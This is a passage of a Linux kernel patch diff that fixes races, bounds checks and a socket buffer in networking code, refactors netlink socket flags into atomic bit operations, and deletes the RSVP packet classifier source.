++		.private = MEMFILE_PRIVATE(_KMEM, RES_LIMIT),
++		.write = mem_cgroup_write,
++		.read_u64 = mem_cgroup_read_u64,
++	},
+ 	{
+ 		.name = "kmem.usage_in_bytes",
+ 		.private = MEMFILE_PRIVATE(_KMEM, RES_USAGE),
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index 146553c0054f6..fa4dd5fab0d44 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2436,6 +2436,9 @@ static int hci_suspend_notifier(struct notifier_block *nb, unsigned long action,
+ 	if (hci_dev_test_flag(hdev, HCI_USER_CHANNEL))
+ 		return NOTIFY_DONE;
+ 
++	/* To avoid a potential race with hci_unregister_dev. */
++	hci_dev_hold(hdev);
++
+ 	if (action == PM_SUSPEND_PREPARE)
+ 		ret = hci_suspend_dev(hdev);
+ 	else if (action == PM_POST_SUSPEND)
+@@ -2445,6 +2448,7 @@ static int hci_suspend_notifier(struct notifier_block *nb, unsigned long action,
+ 		bt_dev_err(hdev, "Suspend notifier action (%lu) failed: %d",
+ 			   action, ret);
+ 
++	hci_dev_put(hdev);
+ 	return NOTIFY_DONE;
+ }
+ 
+diff --git a/net/bridge/netfilter/ebtables.c b/net/bridge/netfilter/ebtables.c
+index 757ec46fc45a0..aa23479b20b2a 100644
+--- a/net/bridge/netfilter/ebtables.c
++++ b/net/bridge/netfilter/ebtables.c
+@@ -2115,8 +2115,7 @@ static int size_entry_mwt(const struct ebt_entry *entry, const unsigned char *ba
+ 		return ret;
+ 
+ 	offsets[0] = sizeof(struct ebt_entry); /* matches come first */
+-	memcpy(&offsets[1], &entry->watchers_offset,
+-			sizeof(offsets) - sizeof(offsets[0]));
++	memcpy(&offsets[1], &entry->offsets, sizeof(entry->offsets));
+ 
+ 	if (state->buf_kern_start) {
+ 		buf_start = state->buf_kern_start + state->buf_kern_offset;
+diff --git a/net/core/sock.c b/net/core/sock.c
+index e5858fa5d6d57..0ee2e33bbe5f8 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -1774,14 +1774,14 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 
+ 	case SO_PEERNAME:
+ 	{
+-		char address[128];
++		struct sockaddr_storage address;
+ 
+-		lv = sock->ops->getname(sock, (struct sockaddr *)address, 2);
++		lv = sock->ops->getname(sock, (struct sockaddr *)&address, 2);
+ 		if (lv < 0)
+ 			return -ENOTCONN;
+ 		if (lv < len)
+ 			return -EINVAL;
+-		if (copy_to_sockptr(optval, address, len))
++		if (copy_to_sockptr(optval, &address, len))
+ 			return -EFAULT;
+ 		goto lenout;
+ 	}
+diff --git a/net/devlink/leftover.c b/net/devlink/leftover.c
+index 63188d6a50fe9..032c7af065cd9 100644
+--- a/net/devlink/leftover.c
++++ b/net/devlink/leftover.c
+@@ -5218,7 +5218,7 @@ static int devlink_param_get(struct devlink *devlink,
+ 			     const struct devlink_param *param,
+ 			     struct devlink_param_gset_ctx *ctx)
+ {
+-	if (!param->get || devlink->reload_failed)
++	if (!param->get)
+ 		return -EOPNOTSUPP;
+ 	return param->get(devlink, param->id, ctx);
+ }
+@@ -5227,7 +5227,7 @@ static int devlink_param_set(struct devlink *devlink,
+ 			     const struct devlink_param *param,
+ 			     struct devlink_param_gset_ctx *ctx)
+ {
+-	if (!param->set || devlink->reload_failed)
++	if (!param->set)
+ 		return -EOPNOTSUPP;
+ 	return param->set(devlink, param->id, ctx);
+ }
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index ebd2cea5b7d7a..66908ce2dd116 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -234,7 +234,7 @@ static int ip_finish_output2(struct net *net, struct sock *sk, struct sk_buff *s
+ 	net_dbg_ratelimited("%s: No header cache and no neighbour!\n",
+ 			    __func__);
+ 	kfree_skb_reason(skb, SKB_DROP_REASON_NEIGH_CREATEFAIL);
+-	return -EINVAL;
++	return PTR_ERR(neigh);
+ }
+ 
+ static int ip_finish_output_gso(struct net *net, struct sock *sk,
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 23a44edcb11f7..cf3453b532d67 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -3991,19 +3991,20 @@ static int ieee80211_probe_client(struct wiphy *wiphy, struct net_device *dev,
+ 	mutex_lock(&local->mtx);
+ 
+ 	rcu_read_lock();
++	sta = sta_info_get_bss(sdata, peer);
++	if (!sta) {
++		ret = -ENOLINK;
++		goto unlock;
++	}
++
++	qos = sta->sta.wme;
++
+ 	chanctx_conf = rcu_dereference(sdata->vif.bss_conf.chanctx_conf);
+ 	if (WARN_ON(!chanctx_conf)) {
+ 		ret = -EINVAL;
+ 		goto unlock;
+ 	}
+ 	band = chanctx_conf->def.chan->band;
+-	sta = sta_info_get_bss(sdata, peer);
+-	if (sta) {
+-		qos = sta->sta.wme;
+-	} else {
+-		ret = -ENOLINK;
+-		goto unlock;
+-	}
+ 
+ 	if (qos) {
+ 		fc = cpu_to_le16(IEEE80211_FTYPE_DATA |
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index 55dc0610e8633..c4c80037df91d 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -3625,6 +3625,10 @@ ieee80211_rx_h_action(struct ieee80211_rx_data *rx)
+ 			break;
+ 		goto queue;
+ 	case WLAN_CATEGORY_S1G:
++		if (len < offsetofend(typeof(*mgmt),
++				      u.action.u.s1g.action_code))
++			break;
++
+ 		switch (mgmt->u.action.u.s1g.action_code) {
+ 		case WLAN_S1G_TWT_SETUP:
+ 		case WLAN_S1G_TWT_TEARDOWN:
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index ed123cf462afe..387e430a35ccc 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -84,7 +84,7 @@ struct listeners {
+ 
+ static inline int netlink_is_kernel(struct sock *sk)
+ {
+-	return nlk_sk(sk)->flags & NETLINK_F_KERNEL_SOCKET;
++	return nlk_test_bit(KERNEL_SOCKET, sk);
+ }
+ 
+ struct netlink_table *nl_table __read_mostly;
+@@ -349,9 +349,7 @@ static void netlink_deliver_tap_kernel(struct sock *dst, struct sock *src,
+ 
+ static void netlink_overrun(struct sock *sk)
+ {
+-	struct netlink_sock *nlk = nlk_sk(sk);
+-
+-	if (!(nlk->flags & NETLINK_F_RECV_NO_ENOBUFS)) {
++	if (!nlk_test_bit(RECV_NO_ENOBUFS, sk)) {
+ 		if (!test_and_set_bit(NETLINK_S_CONGESTED,
+ 				      &nlk_sk(sk)->state)) {
+ 			sk->sk_err = ENOBUFS;
+@@ -1391,9 +1389,7 @@ EXPORT_SYMBOL_GPL(netlink_has_listeners);
+ 
+ bool netlink_strict_get_check(struct sk_buff *skb)
+ {
+-	const struct netlink_sock *nlk = nlk_sk(NETLINK_CB(skb).sk);
+-
+-	return nlk->flags & NETLINK_F_STRICT_CHK;
++	return nlk_test_bit(STRICT_CHK, NETLINK_CB(skb).sk);
+ }
+ EXPORT_SYMBOL_GPL(netlink_strict_get_check);
+ 
+@@ -1437,7 +1433,7 @@ static void do_one_broadcast(struct sock *sk,
+ 		return;
+ 
+ 	if (!net_eq(sock_net(sk), p->net)) {
+-		if (!(nlk->flags & NETLINK_F_LISTEN_ALL_NSID))
++		if (!nlk_test_bit(LISTEN_ALL_NSID, sk))
+ 			return;
+ 
+ 		if (!peernet_has_id(sock_net(sk), p->net))
+@@ -1470,7 +1466,7 @@ static void do_one_broadcast(struct sock *sk,
+ 		netlink_overrun(sk);
+ 		/* Clone failed. Notify ALL listeners. */
+ 		p->failure = 1;
+-		if (nlk->flags & NETLINK_F_BROADCAST_SEND_ERROR)
++		if (nlk_test_bit(BROADCAST_SEND_ERROR, sk))
+ 			p->delivery_failure = 1;
+ 		goto out;
+ 	}
+@@ -1485,7 +1481,7 @@ static void do_one_broadcast(struct sock *sk,
+ 	val = netlink_broadcast_deliver(sk, p->skb2);
+ 	if (val < 0) {
+ 		netlink_overrun(sk);
+-		if (nlk->flags & NETLINK_F_BROADCAST_SEND_ERROR)
++		if (nlk_test_bit(BROADCAST_SEND_ERROR, sk))
+ 			p->delivery_failure = 1;
+ 	} else {
+ 		p->congested |= val;
+@@ -1565,7 +1561,7 @@ static int do_one_set_err(struct sock *sk, struct netlink_set_err_data *p)
+ 	    !test_bit(p->group - 1, nlk->groups))
+ 		goto out;
+ 
+-	if (p->code == ENOBUFS && nlk->flags & NETLINK_F_RECV_NO_ENOBUFS) {
++	if (p->code == ENOBUFS && nlk_test_bit(RECV_NO_ENOBUFS, sk)) {
+ 		ret = 1;
+ 		goto out;
+ 	}
+@@ -1632,7 +1628,7 @@ static int netlink_setsockopt(struct socket *sock, int level, int optname,
+ 	struct sock *sk = sock->sk;
+ 	struct netlink_sock *nlk = nlk_sk(sk);
+ 	unsigned int val = 0;
+-	int err;
++	int nr = -1;
+ 
+ 	if (level != SOL_NETLINK)
+ 		return -ENOPROTOOPT;
+@@ -1643,14 +1639,12 @@ static int netlink_setsockopt(struct socket *sock, int level, int optname,
+ 
+ 	switch (optname) {
+ 	case NETLINK_PKTINFO:
+-		if (val)
+-			nlk->flags |= NETLINK_F_RECV_PKTINFO;
+-		else
+-			nlk->flags &= ~NETLINK_F_RECV_PKTINFO;
+-		err = 0;
++		nr = NETLINK_F_RECV_PKTINFO;
+ 		break;
+ 	case NETLINK_ADD_MEMBERSHIP:
+ 	case NETLINK_DROP_MEMBERSHIP: {
++		int err;
++
+ 		if (!netlink_allowed(sock, NL_CFG_F_NONROOT_RECV))
+ 			return -EPERM;
+ 		err = netlink_realloc_groups(sk);
+@@ -1670,61 +1664,38 @@ static int netlink_setsockopt(struct socket *sock, int level, int optname,
+ 		if (optname == NETLINK_DROP_MEMBERSHIP && nlk->netlink_unbind)
+ 			nlk->netlink_unbind(sock_net(sk), val);
+ 
+-		err = 0;
+ 		break;
+ 	}
+ 	case NETLINK_BROADCAST_ERROR:
+-		if (val)
+-			nlk->flags |= NETLINK_F_BROADCAST_SEND_ERROR;
+-		else
+-			nlk->flags &= ~NETLINK_F_BROADCAST_SEND_ERROR;
+-		err = 0;
++		nr = NETLINK_F_BROADCAST_SEND_ERROR;
+ 		break;
+ 	case NETLINK_NO_ENOBUFS:
++		assign_bit(NETLINK_F_RECV_NO_ENOBUFS, &nlk->flags, val);
+ 		if (val) {
+-			nlk->flags |= NETLINK_F_RECV_NO_ENOBUFS;
+ 			clear_bit(NETLINK_S_CONGESTED, &nlk->state);
+ 			wake_up_interruptible(&nlk->wait);
+-		} else {
+-			nlk->flags &= ~NETLINK_F_RECV_NO_ENOBUFS;
+ 		}
+-		err = 0;
+ 		break;
+ 	case NETLINK_LISTEN_ALL_NSID:
+ 		if (!ns_capable(sock_net(sk)->user_ns, CAP_NET_BROADCAST))
+ 			return -EPERM;
+-
+-		if (val)
+-			nlk->flags |= NETLINK_F_LISTEN_ALL_NSID;
+-		else
+-			nlk->flags &= ~NETLINK_F_LISTEN_ALL_NSID;
+-		err = 0;
++		nr = NETLINK_F_LISTEN_ALL_NSID;
+ 		break;
+ 	case NETLINK_CAP_ACK:
+-		if (val)
+-			nlk->flags |= NETLINK_F_CAP_ACK;
+-		else
+-			nlk->flags &= ~NETLINK_F_CAP_ACK;
+-		err = 0;
++		nr = NETLINK_F_CAP_ACK;
+ 		break;
+ 	case NETLINK_EXT_ACK:
+-		if (val)
+-			nlk->flags |= NETLINK_F_EXT_ACK;
+-		else
+-			nlk->flags &= ~NETLINK_F_EXT_ACK;
+-		err = 0;
++		nr = NETLINK_F_EXT_ACK;
+ 		break;
+ 	case NETLINK_GET_STRICT_CHK:
+-		if (val)
+-			nlk->flags |= NETLINK_F_STRICT_CHK;
+-		else
+-			nlk->flags &= ~NETLINK_F_STRICT_CHK;
+-		err = 0;
++		nr = NETLINK_F_STRICT_CHK;
+ 		break;
+ 	default:
+-		err = -ENOPROTOOPT;
++		return -ENOPROTOOPT;
+ 	}
+-	return err;
++	if (nr >= 0)
++		assign_bit(nr, &nlk->flags, val);
++	return 0;
+ }
+ 
+ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+@@ -1791,7 +1762,7 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ 		return -EINVAL;
+ 
+ 	len = sizeof(int);
+-	val = nlk->flags & flag ? 1 : 0;
++	val = test_bit(flag, &nlk->flags);
+ 
+ 	if (put_user(len, optlen) ||
+ 	    copy_to_user(optval, &val, len))
+@@ -1968,9 +1939,9 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 		msg->msg_namelen = sizeof(*addr);
+ 	}
+ 
+-	if (nlk->flags & NETLINK_F_RECV_PKTINFO)
++	if (nlk_test_bit(RECV_PKTINFO, sk))
+ 		netlink_cmsg_recv_pktinfo(msg, skb);
+-	if (nlk->flags & NETLINK_F_LISTEN_ALL_NSID)
++	if (nlk_test_bit(LISTEN_ALL_NSID, sk))
+ 		netlink_cmsg_listen_all_nsid(sk, msg, skb);
+ 
+ 	memset(&scm, 0, sizeof(scm));
+@@ -2047,7 +2018,7 @@ __netlink_kernel_create(struct net *net, int unit, struct module *module,
+ 		goto out_sock_release;
+ 
+ 	nlk = nlk_sk(sk);
+-	nlk->flags |= NETLINK_F_KERNEL_SOCKET;
++	set_bit(NETLINK_F_KERNEL_SOCKET, &nlk->flags);
+ 
+ 	netlink_table_grab();
+ 	if (!nl_table[unit].registered) {
+@@ -2183,7 +2154,7 @@ static int netlink_dump_done(struct netlink_sock *nlk, struct sk_buff *skb,
+ 	nl_dump_check_consistent(cb, nlh);
+ 	memcpy(nlmsg_data(nlh), &nlk->dump_done_errno, sizeof(nlk->dump_done_errno));
+ 
+-	if (extack->_msg && nlk->flags & NETLINK_F_EXT_ACK) {
++	if (extack->_msg && test_bit(NETLINK_F_EXT_ACK, &nlk->flags)) {
+ 		nlh->nlmsg_flags |= NLM_F_ACK_TLVS;
+ 		if (!nla_put_string(skb, NLMSGERR_ATTR_MSG, extack->_msg))
+ 			nlmsg_end(skb, nlh);
+@@ -2312,8 +2283,8 @@ int __netlink_dump_start(struct sock *ssk, struct sk_buff *skb,
+ 			 const struct nlmsghdr *nlh,
+ 			 struct netlink_dump_control *control)
+ {
+-	struct netlink_sock *nlk, *nlk2;
+ 	struct netlink_callback *cb;
++	struct netlink_sock *nlk;
+ 	struct sock *sk;
+ 	int ret;
+ 
+@@ -2348,8 +2319,7 @@ int __netlink_dump_start(struct sock *ssk, struct sk_buff *skb,
+ 	cb->min_dump_alloc = control->min_dump_alloc;
+ 	cb->skb = skb;
+ 
+-	nlk2 = nlk_sk(NETLINK_CB(skb).sk);
+-	cb->strict_check = !!(nlk2->flags & NETLINK_F_STRICT_CHK);
++	cb->strict_check = nlk_test_bit(STRICT_CHK, NETLINK_CB(skb).sk);
+ 
+ 	if (control->start) {
+ 		ret = control->start(cb);
+@@ -2391,7 +2361,7 @@ netlink_ack_tlv_len(struct netlink_sock *nlk, int err,
+ {
+ 	size_t tlvlen;
+ 
+-	if (!extack || !(nlk->flags & NETLINK_F_EXT_ACK))
++	if (!extack || !test_bit(NETLINK_F_EXT_ACK, &nlk->flags))
+ 		return 0;
+ 
+ 	tlvlen = 0;
+@@ -2463,7 +2433,7 @@ void netlink_ack(struct sk_buff *in_skb, struct nlmsghdr *nlh, int err,
+ 	 * requests to cap the error message, and get extra error data if
+ 	 * requested.
+ 	 */
+-	if (err && !(nlk->flags & NETLINK_F_CAP_ACK))
++	if (err && !test_bit(NETLINK_F_CAP_ACK, &nlk->flags))
+ 		payload += nlmsg_len(nlh);
+ 	else
+ 		flags |= NLM_F_CAPPED;
+diff --git a/net/netlink/af_netlink.h b/net/netlink/af_netlink.h
+index 5f454c8de6a4d..b30b8fc760f71 100644
+--- a/net/netlink/af_netlink.h
++++ b/net/netlink/af_netlink.h
+@@ -8,14 +8,16 @@
+ #include <net/sock.h>
+ 
+ /* flags */
+-#define NETLINK_F_KERNEL_SOCKET		0x1
+-#define NETLINK_F_RECV_PKTINFO		0x2
+-#define NETLINK_F_BROADCAST_SEND_ERROR	0x4
+-#define NETLINK_F_RECV_NO_ENOBUFS	0x8
+-#define NETLINK_F_LISTEN_ALL_NSID	0x10
+-#define NETLINK_F_CAP_ACK		0x20
+-#define NETLINK_F_EXT_ACK		0x40
+-#define NETLINK_F_STRICT_CHK		0x80
++enum {
++	NETLINK_F_KERNEL_SOCKET,
++	NETLINK_F_RECV_PKTINFO,
++	NETLINK_F_BROADCAST_SEND_ERROR,
++	NETLINK_F_RECV_NO_ENOBUFS,
++	NETLINK_F_LISTEN_ALL_NSID,
++	NETLINK_F_CAP_ACK,
++	NETLINK_F_EXT_ACK,
++	NETLINK_F_STRICT_CHK,
++};
+ 
+ #define NLGRPSZ(x)	(ALIGN(x, sizeof(unsigned long) * 8) / 8)
+ #define NLGRPLONGS(x)	(NLGRPSZ(x)/sizeof(unsigned long))
+@@ -23,10 +25,10 @@
+ struct netlink_sock {
+ 	/* struct sock has to be the first member of netlink_sock */
+ 	struct sock		sk;
++	unsigned long		flags;
+ 	u32			portid;
+ 	u32			dst_portid;
+ 	u32			dst_group;
+-	u32			flags;
+ 	u32			subscriptions;
+ 	u32			ngroups;
+ 	unsigned long		*groups;
+@@ -54,6 +56,8 @@ static inline struct netlink_sock *nlk_sk(struct sock *sk)
+ 	return container_of(sk, struct netlink_sock, sk);
+ }
+ 
++#define nlk_test_bit(nr, sk) test_bit(NETLINK_F_##nr, &nlk_sk(sk)->flags)
++
+ struct netlink_table {
+ 	struct rhashtable	hash;
+ 	struct hlist_head	mc_list;
+diff --git a/net/netlink/diag.c b/net/netlink/diag.c
+index e4f21b1067bcc..9c4f231be2757 100644
+--- a/net/netlink/diag.c
++++ b/net/netlink/diag.c
+@@ -27,15 +27,15 @@ static int sk_diag_put_flags(struct sock *sk, struct sk_buff *skb)
+ 
+ 	if (nlk->cb_running)
+ 		flags |= NDIAG_FLAG_CB_RUNNING;
+-	if (nlk->flags & NETLINK_F_RECV_PKTINFO)
++	if (nlk_test_bit(RECV_PKTINFO, sk))
+ 		flags |= NDIAG_FLAG_PKTINFO;
+-	if (nlk->flags & NETLINK_F_BROADCAST_SEND_ERROR)
++	if (nlk_test_bit(BROADCAST_SEND_ERROR, sk))
+ 		flags |= NDIAG_FLAG_BROADCAST_ERROR;
+-	if (nlk->flags & NETLINK_F_RECV_NO_ENOBUFS)
++	if (nlk_test_bit(RECV_NO_ENOBUFS, sk))
+ 		flags |= NDIAG_FLAG_NO_ENOBUFS;
+-	if (nlk->flags & NETLINK_F_LISTEN_ALL_NSID)
++	if (nlk_test_bit(LISTEN_ALL_NSID, sk))
+ 		flags |= NDIAG_FLAG_LISTEN_ALL_NSID;
+-	if (nlk->flags & NETLINK_F_CAP_ACK)
++	if (nlk_test_bit(CAP_ACK, sk))
+ 		flags |= NDIAG_FLAG_CAP_ACK;
+ 
+ 	return nla_put_u32(skb, NETLINK_DIAG_FLAGS, flags);
+diff --git a/net/sched/Kconfig b/net/sched/Kconfig
+index bcdd6e925343f..24cf0bf7c80e5 100644
+--- a/net/sched/Kconfig
++++ b/net/sched/Kconfig
+@@ -548,34 +548,6 @@ config CLS_U32_MARK
+ 	help
+ 	  Say Y here to be able to use netfilter marks as u32 key.
+ 
+-config NET_CLS_RSVP
+-	tristate "IPv4 Resource Reservation Protocol (RSVP)"
+-	select NET_CLS
+-	help
+-	  The Resource Reservation Protocol (RSVP) permits end systems to
+-	  request a minimum and maximum data flow rate for a connection; this
+-	  is important for real time data such as streaming sound or video.
+-
+-	  Say Y here if you want to be able to classify outgoing packets based
+-	  on their RSVP requests.
+-
+-	  To compile this code as a module, choose M here: the
+-	  module will be called cls_rsvp.
+-
+-config NET_CLS_RSVP6
+-	tristate "IPv6 Resource Reservation Protocol (RSVP6)"
+-	select NET_CLS
+-	help
+-	  The Resource Reservation Protocol (RSVP) permits end systems to
+-	  request a minimum and maximum data flow rate for a connection; this
+-	  is important for real time data such as streaming sound or video.
+-
+-	  Say Y here if you want to be able to classify outgoing packets based
+-	  on their RSVP requests and you are using the IPv6 protocol.
+-
+-	  To compile this code as a module, choose M here: the
+-	  module will be called cls_rsvp6.
+-
+ config NET_CLS_FLOW
+ 	tristate "Flow classifier"
+ 	select NET_CLS
+diff --git a/net/sched/Makefile b/net/sched/Makefile
+index b7dbac5c519f6..8a33a35fc50d5 100644
+--- a/net/sched/Makefile
++++ b/net/sched/Makefile
+@@ -69,8 +69,6 @@ obj-$(CONFIG_NET_SCH_TAPRIO)	+= sch_taprio.o
+ obj-$(CONFIG_NET_CLS_U32)	+= cls_u32.o
+ obj-$(CONFIG_NET_CLS_ROUTE4)	+= cls_route.o
+ obj-$(CONFIG_NET_CLS_FW)	+= cls_fw.o
+-obj-$(CONFIG_NET_CLS_RSVP)	+= cls_rsvp.o
+-obj-$(CONFIG_NET_CLS_RSVP6)	+= cls_rsvp6.o
+ obj-$(CONFIG_NET_CLS_BASIC)	+= cls_basic.o
+ obj-$(CONFIG_NET_CLS_FLOW)	+= cls_flow.o
+ obj-$(CONFIG_NET_CLS_CGROUP)	+= cls_cgroup.o
+diff --git a/net/sched/cls_rsvp.c b/net/sched/cls_rsvp.c
+deleted file mode 100644
+index de1c1d4da5977..0000000000000
+--- a/net/sched/cls_rsvp.c
++++ /dev/null
+@@ -1,24 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * net/sched/cls_rsvp.c	Special RSVP packet classifier for IPv4.
+- *
+- * Authors:	Alexey Kuznetsov, <kuznet@ms2.inr.ac.ru>
+- */
+-
+-#include <linux/module.h>
+-#include <linux/types.h>
+-#include <linux/kernel.h>
+-#include <linux/string.h>
+-#include <linux/errno.h>
+-#include <linux/skbuff.h>
+-#include <net/ip.h>
+-#include <net/netlink.h>
+-#include <net/act_api.h>
+-#include <net/pkt_cls.h>
+-
+-#define RSVP_DST_LEN	1
+-#define RSVP_ID		"rsvp"
+-#define RSVP_OPS	cls_rsvp_ops
+-
+-#include "cls_rsvp.h"
+-MODULE_LICENSE("GPL");
+diff --git a/net/sched/cls_rsvp.h b/net/sched/cls_rsvp.h
+deleted file mode 100644
+index b00a7dbd05874..0000000000000
+--- a/net/sched/cls_rsvp.h
++++ /dev/null
+@@ -1,764 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- * net/sched/cls_rsvp.h	Template file for RSVPv[46] classifiers.
+- *
+- * Authors:	Alexey Kuznetsov, <kuznet@ms2.inr.ac.ru>
+- */
+-
+-/*
+-   Comparing to general packet classification problem,
+-   RSVP needs only several relatively simple rules:
+-
+-   * (dst, protocol) are always specified,
+-     so that we are able to hash them.
+-   * src may be exact, or may be wildcard, so that
+-     we can keep a hash table plus one wildcard entry.
+-   * source port (or flow label) is important only if src is given.
+-
+-   IMPLEMENTATION.
+-
+-   We use a two level hash table: The top level is keyed by
+-   destination address and protocol ID, every bucket contains a list
+-   of "rsvp sessions", identified by destination address, protocol and
+-   DPI(="Destination Port ID"): triple (key, mask, offset).
+-
+-   Every bucket has a smaller hash table keyed by source address
+-   (cf. RSVP flowspec) and one wildcard entry for wildcard reservations.
+-   Every bucket is again a list of "RSVP flows", selected by
+-   source address and SPI(="Source Port ID" here rather than
+-   "security parameter index"): triple (key, mask, offset).
+-
+-
+-   NOTE 1. All the packets with IPv6 extension headers (but AH and ESP)
+-   and all fragmented packets go to the best-effort traffic class.
+-
+-
+-   NOTE 2. Two "port id"'s seems to be redundant, rfc2207 requires
+-   only one "Generalized Port Identifier". So that for classic
+-   ah, esp (and udp,tcp) both *pi should coincide or one of them
+-   should be wildcard.
+-
+-   At first sight, this redundancy is just a waste of CPU
+-   resources. But DPI and SPI add the possibility to assign different
+-   priorities to GPIs. Look also at note 4 about tunnels below.
+-
+-
+-   NOTE 3. One complication is the case of tunneled packets.
+-   We implement it as following: if the first lookup
+-   matches a special session with "tunnelhdr" value not zero,
+-   flowid doesn't contain the true flow ID, but the tunnel ID (1...255).
+-   In this case, we pull tunnelhdr bytes and restart lookup
+-   with tunnel ID added to the list of keys. Simple and stupid 8)8)
+-   It's enough for PIMREG and IPIP.
+-
+-
+-   NOTE 4. Two GPIs make it possible to parse even GRE packets.
+-   F.e. DPI can select ETH_P_IP (and necessary flags to make
+-   tunnelhdr correct) in GRE protocol field and SPI matches
+-   GRE key. Is it not nice? 8)8)
+-
+-
+-   Well, as result, despite its simplicity, we get a pretty
+-   powerful classification engine.  */
+-
+-
+-struct rsvp_head {
+-	u32			tmap[256/32];
+-	u32			hgenerator;
+-	u8			tgenerator;
+-	struct rsvp_session __rcu *ht[256];
+-	struct rcu_head		rcu;
+-};
+-
+-struct rsvp_session {
+-	struct rsvp_session __rcu	*next;
+-	__be32				dst[RSVP_DST_LEN];
+-	struct tc_rsvp_gpi		dpi;
+-	u8				protocol;
+-	u8				tunnelid;
+-	/* 16 (src,sport) hash slots, and one wildcard source slot */
+-	struct rsvp_filter __rcu	*ht[16 + 1];
+-	struct rcu_head			rcu;
+-};
+-
+-
+-struct rsvp_filter {
+-	struct rsvp_filter __rcu	*next;
+-	__be32				src[RSVP_DST_LEN];
+-	struct tc_rsvp_gpi		spi;
+-	u8				tunnelhdr;
+-
+-	struct tcf_result		res;
+-	struct tcf_exts			exts;
+-
+-	u32				handle;
+-	struct rsvp_session		*sess;
+-	struct rcu_work			rwork;
+-};
+-
+-static inline unsigned int hash_dst(__be32 *dst, u8 protocol, u8 tunnelid)
+-{
+-	unsigned int h = (__force __u32)dst[RSVP_DST_LEN - 1];
+-
+-	h ^= h>>16;
+-	h ^= h>>8;
+-	return (h ^ protocol ^ tunnelid) & 0xFF;
+-}
+-
+-static inline unsigned int hash_src(__be32 *src)
+-{
+-	unsigned int h = (__force __u32)src[RSVP_DST_LEN-1];
+-
+-	h ^= h>>16;
+-	h ^= h>>8;
+-	h ^= h>>4;
+-	return h & 0xF;
+-}
+-
+-#define RSVP_APPLY_RESULT()				\
+-{							\
+-	int r = tcf_exts_exec(skb, &f->exts, res);	\
+-	if (r < 0)					\
+-		continue;				\
+-	else if (r > 0)					\
+-		return r;				\
+-}
+-
+-static int rsvp_classify(struct sk_buff *skb, const struct tcf_proto *tp,
+-			 struct tcf_result *res)
+-{
+-	struct rsvp_head *head = rcu_dereference_bh(tp->root);
+-	struct rsvp_session *s;
+-	struct rsvp_filter *f;
+-	unsigned int h1, h2;
+-	__be32 *dst, *src;
+-	u8 protocol;
+-	u8 tunnelid = 0;
+-	u8 *xprt;
+-#if RSVP_DST_LEN == 4
+-	struct ipv6hdr *nhptr;
+-
+-	if (!pskb_network_may_pull(skb, sizeof(*nhptr)))
+-		return -1;
+-	nhptr = ipv6_hdr(skb);
+-#else
+-	struct iphdr *nhptr;
+-
+-	if (!pskb_network_may_pull(skb, sizeof(*nhptr)))
+-		return -1;
+-	nhptr = ip_hdr(skb);
+-#endif
+-restart:
+-
+-#if RSVP_DST_LEN == 4
+-	src = &nhptr->saddr.s6_addr32[0];
+-	dst = &nhptr->daddr.s6_addr32[0];
+-	protocol = nhptr->nexthdr;
+-	xprt = ((u8 *)nhptr) + sizeof(struct ipv6hdr);
+-#else
+-	src = &nhptr->saddr;
+-	dst = &nhptr->daddr;
+-	protocol = nhptr->protocol;
+-	xprt = ((u8 *)nhptr) + (nhptr->ihl<<2);
+-	if (ip_is_fragment(nhptr))
+-		return -1;
+-#endif
+-
+-	h1 = hash_dst(dst, protocol, tunnelid);
+-	h2 = hash_src(src);
+-
+-	for (s = rcu_dereference_bh(head->ht[h1]); s;
+-	     s = rcu_dereference_bh(s->next)) {
+-		if (dst[RSVP_DST_LEN-1] == s->dst[RSVP_DST_LEN - 1] &&
+-		    protocol == s->protocol &&
+-		    !(s->dpi.mask &
+-		      (*(u32 *)(xprt + s->dpi.offset) ^ s->dpi.key)) &&
+-#if RSVP_DST_LEN == 4
+-		    dst[0] == s->dst[0] &&
+-		    dst[1] == s->dst[1] &&
+-		    dst[2] == s->dst[2] &&
+-#endif
+-		    tunnelid == s->tunnelid) {
+-
+-			for (f = rcu_dereference_bh(s->ht[h2]); f;
+-			     f = rcu_dereference_bh(f->next)) {
+-				if (src[RSVP_DST_LEN-1] == f->src[RSVP_DST_LEN - 1] &&
+-				    !(f->spi.mask & (*(u32 *)(xprt + f->spi.offset) ^ f->spi.key))
+-#if RSVP_DST_LEN == 4
+-				    &&
+-				    src[0] == f->src[0] &&
+-				    src[1] == f->src[1] &&
+-				    src[2] == f->src[2]
+-#endif
+-				    ) {
+-					*res = f->res;
+-					RSVP_APPLY_RESULT();
+-
+-matched:
+-					if (f->tunnelhdr == 0)
+-						return 0;
+-
+-					tunnelid = f->res.classid;
+-					nhptr = (void *)(xprt + f->tunnelhdr - sizeof(*nhptr));
+-					goto restart;
+-				}
+-			}
+-
+-			/* And wildcard bucket... */
+-			for (f = rcu_dereference_bh(s->ht[16]); f;
+-			     f = rcu_dereference_bh(f->next)) {
+-				*res = f->res;
+-				RSVP_APPLY_RESULT();
+-				goto matched;
+-			}
+-			return -1;
+-		}
+-	}
+-	return -1;
+-}
+-
+-static void rsvp_replace(struct tcf_proto *tp, struct rsvp_filter *n, u32 h)
+-{
+-	struct rsvp_head *head = rtnl_dereference(tp->root);
+-	struct rsvp_session *s;
+-	struct rsvp_filter __rcu **ins;
+-	struct rsvp_filter *pins;
+-	unsigned int h1 = h & 0xFF;
+-	unsigned int h2 = (h >> 8) & 0xFF;
+-
+-	for (s = rtnl_dereference(head->ht[h1]); s;
